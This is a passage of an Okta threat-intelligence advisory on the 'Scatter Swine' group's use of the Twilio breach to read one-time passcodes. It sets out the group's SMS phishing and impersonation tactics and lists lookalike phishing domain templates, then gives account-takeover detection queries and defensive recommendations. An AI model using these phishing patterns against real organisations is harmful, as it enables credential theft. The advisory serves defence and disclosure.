hours.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"On the evening of Sunday, August 7, 2022, Twilio \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.twilio.com/blog/august-2022-social-engineering-attack\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"disclosed\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that a number of Twilio customer accounts and internal applications were accessed in attacks that resulted from one or more of these phishing campaigns.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta offers customers a range of authenticators to choose from, including the use of SMS for the delivery of one-time codes. Twilio provides one of two services Okta leverages for customers that choose to use SMS as an authentication factor.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"On August 8, 2022, Twilio provided an initial notification to Okta, to inform us that unspecified data relevant to Okta was accessed during Twilio’s incident.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta prioritized routing of SMS-based communications to an alternative provider while we worked with Twilio’s security team to understand the scope and impact of the incident.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Twilio security team supported our investigation by subsequently providing internal system logs which we were able to use to correlate and identify the extent of the threat actor’s activity as it pertains to Okta customer data.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Using these logs, Okta’s Defensive Cyber Operations’ analysis established that two categories of Okta-relevant mobile phone numbers and one-time passwords were viewable during the time in which the attacker had access to the Twilio console. A one-time passcode is valid for five minutes.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"primary\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" category (see “Targeted Activity” below) are those mobile phone numbers the threat actor searched for directly in the Twilio console.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"secondary\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" category (see “Incidental Exposure” below) are mobile phone numbers that can be considered ‘incidental’ to the specific actions or objectives of the threat actor.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has notified customers with mobile phone numbers in both of the above categories.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Targeted Activity\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The threat actor searched for 38 unique phone numbers in the Twilio console, nearly all of which can be linked to a single targeted organization.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A review of logs provided to us by Twilio revealed that the threat actor was seeking to expand their access. We assess that the threat actor used credentials (usernames and passwords) previously stolen in phishing campaigns to trigger SMS-based MFA challenges, and used access to Twilio systems to search for One Time Passwords sent in those challenges.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Incidental Exposure\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The second category of exposed mobile phone numbers were incidental to this activity. Incidental, in this case, can be defined as phone numbers that may have been present in the Twilio portal during the threat actor's limited activity window. Okta's analysis reveals no indication that the threat actor targeted or used such mobile phone numbers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The threat actor performed their searches using Twilio administrative portals that (by default) list the most recent 50 messages sent using Okta’s Twilio account.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta usernames are not visible in Twilio logs.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The threat actor took no actions that indicated an intent to use access to this information, an observation we have verified via extensive investigation (described below).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Intrusion Analysis\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"After analyzing suspicious activity and identifying key TTPs used by the threat actor, Okta performed threat hunting across our platform logs during the time period that the threat actor was known to have had access to Twilio’s systems. Some example threat hunting searches are provided below.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This exercise uncovered an event in which the threat actor successfully tested this technique against a single account unrelated to the primary target. The threat actor did not perform any additional actions once they had validated this access, and returned to their prior activity.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Outside of this isolated event, there is no evidence that the threat actor successfully used this technique to expand the scope of its access outside of their primary target.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Tactics, Techniques and Procedures\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Scatter Swine has directly targeted Okta via phishing campaigns on several occasions, but was unable to access accounts due to the strong authentication policies that protect access to our applications.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Security has observed the following TTPs (tactics, techniques and procedures) employed by Scatter Swine:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The threat actor makes use of infrastructure provided by Bitcoin-friendly provider Bitlaunch, providing servers from DigitalOcean, Vultr, and Linode.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Preferred domain name registrars include Namecheap or Porkbun, both of which accept Bitcoin as payment.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We have observed the threat actor delivering phishing lures in bulk to individuals in targeted organizations via text messages. We are aware of multiple instances where hundreds of messages were sent to employees and even to family members of employees.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The threat actor likely harvests mobile phone numbers from commercially available data aggregation services that link phone numbers to employees at specific organizations.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The threat actor calls targeted individuals and impersonates support trying to understand how authentication works. The accent of the threat actor appears to be North American, confident and clearly spoken.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The threat actor’s targets have included technology companies, telecommunications providers and organizations and individuals linked to cryptocurrency.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The threat actor predominately hosts self-contained, HTTP-based phishing infrastructure. Their sites do not use TLS certificates.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If the threat actor successfully harvests user credentials during a SMishing (SMS phishing) campaign, attempts are made to authenticate using anonymizing proxy services. In this particular campaign the threat actor favored Mullvad VPN.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The phishing kit used by the threat actor is designed to capture usernames, passwords and OTP factors. We have also observed the threat actor triggering multiple push notifications in an attempt to trick a target into allowing access to the account.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The threat actor has been observed connecting to multiple users from the same Windows device.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The threat actor registers domain names in common formats in order to socially engineer targets into entering their credentials into their phishing sites.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"{targeted organization}-corp.net\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"{targeted organization}-help.com\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"{targeted organization}-help.net\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"{targeted organization}-helpdesk.com\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"{targeted organization}-login.co\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"{targeted organization}-mfa.com\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"{targeted organization}-okta.co\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"{targeted organization}-okta.com\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"{targeted organization}-okta.net\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"{targeted organization}-okta.org\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"{targeted organization}-okta.us\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"{targeted organization}-onelogin.com\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"{targeted organization}-sso.com\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"{targeted organization}-sso.net\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"{targeted organization}-vpn.com\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"{targeted organization}-vpn.net\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"{targeted organization}-vpn.org\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta-{targeted organization}.com\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Stepping up your defenses\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Based on our analysis of this intrusion, we recommend that customers embrace a “defense in depth” approach to protecting user accounts from phishing attacks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Use strong authenticators with the most phishing-resistant properties, such as FIDO2 WebAuthn platform and roaming authenticators and smart cards. Consider FastPass, Okta’s passwordless solution as a longer-term strategy to minimize exposure to credential-based attacks.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Train users to identify indicators of suspicious emails, phishing sites and common social engineering techniques used by attackers. Okta customers can make it easy for users to report potential issues by configuring \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/Security/Security_General.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"End User Notifications\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/suspicious-activity-reporting.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Suspicious Activity Reporting\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Authentication policies can be used to restrict user access to applications based on a range of customer-configurable prerequisites.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Use \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/Security/behavior-detection/configure-behavior-detection.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Behavior Detection\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to act (via step-up authentication) or alert (via System Log) when a user’s sign in behavior deviates from a previous pattern of activity. This threat actor is almost always attempting to authenticate from a new device and new IP that has no previous association with the user.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Use \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/network/network-zones.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Network Zones\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to deny or perform step-up authentication on requests from rarely-used networks and anonymizing proxies.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Restrict access to applications to only those \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/guides/devices/devcontext-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"devices\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that are \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/fp/fp-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"registered\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (with Okta FastPass) or devices \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/managed-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"managed\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" by endpoint management tools, and\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Restrict access to the most sensitive applications and data using application-specific authentication policies. Require re-authentication \\\"every time\\\" a user signs into these resources.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Protect administrative sessions: Take a \\\"Zero Standing Privileges\\\" approach to administrative access. Assign administrators \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/custom-admin-role/custom-admin-roles.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Custom Admin Roles\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" with the least permissions required for daily tasks, and require dual authorization for JIT (just-in-time) access to more privileged roles. Apply ASN and IP Session Binding (from Settings > Features) to all administrative apps to prevent the replay of stolen administrative sessions. Enable \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/admin-console-protected-actions.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Protected Actions\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (under Settings > Features) to force re-authentication whenever an administrative user attempts to perform sensitive actions.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Talk to your SaaS partners about support for \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/appsofthefuture\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Demonstrating Proof-of-Possession, Continuous Access Evaluation Profile (CAEP) and Universal Logout\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Searching Okta System Log for Scatter Swine TTPs\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The following \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Reports/Reports_SysLog.htm#Filters\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta System Log\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" query searches for SMS events (authentication challenges, password resets or factor enrolment events) from new devices and network locations for a given user, filtered according to known TTPs discovered through the analysis of this campaign.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType sw \\\"system.sms.send\\\" \\nand client.device eq \\\"Computer\\\" \\nand client.userAgent.os sw \\\"Windows\\\" \\nand securityContext.isProxy eq \\\"true\\\" \\nand ((debugContext.debugData.behaviors co \\\"New Device=POSITIVE\\\" and debugContext.debugData.behaviors co \\\"New IP=POSITIVE\\\") \\nOR (debugContext.debugData.logOnlySecurityData co \\\"\\\\\\\"New Device\\\\\\\":\\\\\\\"POSITIVE\\\\\\\"\\\" and debugContext.debugData.logOnlySecurityData co \\\"\\\\\\\"New IP\\\\\\\":\\\\\\\"POSITIVE\\\\\\\"\\\"))\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If customers are seeking to check which of these messages transited Twilio, add the following to the query:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"and debugContext.debugData.smsProvider eq \\\"TWILIO\\\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Customers using the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://splunkbase.splunk.com/app/6553/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Add-On for Splunk\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" can run a similar search using the following query:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"index=main sourcetype=\\\"OktaIM2:log\\\" eventType=\\\"system.sms.send*\\\" AND\\nclient.device=\\\"Computer\\\" AND \\\"client.userAgent.os\\\"=\\\"Windows*\\\" AND\\n\\\"securityContext.isProxy\\\" = true AND\\n((debugContext.debugData.behaviors=\\\"*New Device=POSITIVE*\\\" AND\\ndebugContext.debugData.behaviors=\\\"*New IP=POSITIVE*\\\") OR\\n(debugContext.debugData.logOnlySecurityData=\\\"*\\\\\\\"New\\nDevice\\\\\\\":\\\\\\\"POSITIVE\\\\\\\"*\\\" AND\\ndebugContext.debugData.logOnlySecurityData=\\\"*\\\\\\\"New IP\\\\\\\":\\\\\\\"POSITIVE\\\\\\\"*\\\"))\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Further Threat Hunting\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Using the above TTPs, below is an example query for how you might hunt for potential account takeover attempts.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This is a starting point and should be adjusted for your environment. A filter for securityContext.isProxy eq \\\"true\\\" could reduce the scope of events to review.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Equally, consider that the threat actor is known to use VPS providers that accept Bitcoin as payment. Virtual Private Servers are not classified as proxies.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In the example below, we assume that:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The threat actor was NOT using FIDO2/WebAuthn factors.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The threat actor was using a Computer with a Windows Operating System.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The threat actor made the request using a New Device and New IP for the target user.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The threat actor often uses proxies or other anonymization services.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"debugContext.debugData.factor ne \\\"FIDO_WEBAUTHN\\\" and eventType sw\\n\\\"user.authentication.auth_via\\\" and client.device eq \\\"Computer\\\" and\\nclient.userAgent.os sw \\\"Windows\\\" and ((debugContext.debugData.behaviors\\nco \\\"New Device=POSITIVE\\\" and debugContext.debugData.behaviors co \\\"New\\nIP=POSITIVE\\\") OR (debugContext.debugData.logOnlySecurityData co \\\"\\\\\\\"New\\nDevice\\\\\\\":\\\\\\\"POSITIVE\\\\\\\"\\\" and debugContext.debugData.logOnlySecurityData co\\n\\\"\\\\\\\"New IP\\\\\\\":\\\\\\\"POSITIVE\\\\\\\"\\\"))\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For further advice on searching Okta System Log for suspicious events, see \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/System-Log-queries-for-attempted-account-takeover?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"this support article\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Change log:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1.2 - 03/08/2024\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Updated recommendations to include reauthentication frequency.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Updated recommendations to include new features released as part of Okta Secure Identity Commitment: Protected Actions, ASN/IP Session Binding.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1.1 - 08/30/2022\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detection Logic edited in System Log events to reflect that attributes in logOnlySecurityData are captured in a json format {\\\"Key\\\":\\\"Value\\\"}. Detections that evaluate behaviours (debugContext.debugData.behaviors) take the form of Key=Value and remain unchanged.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1.0 - 08/25/2022\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Original version 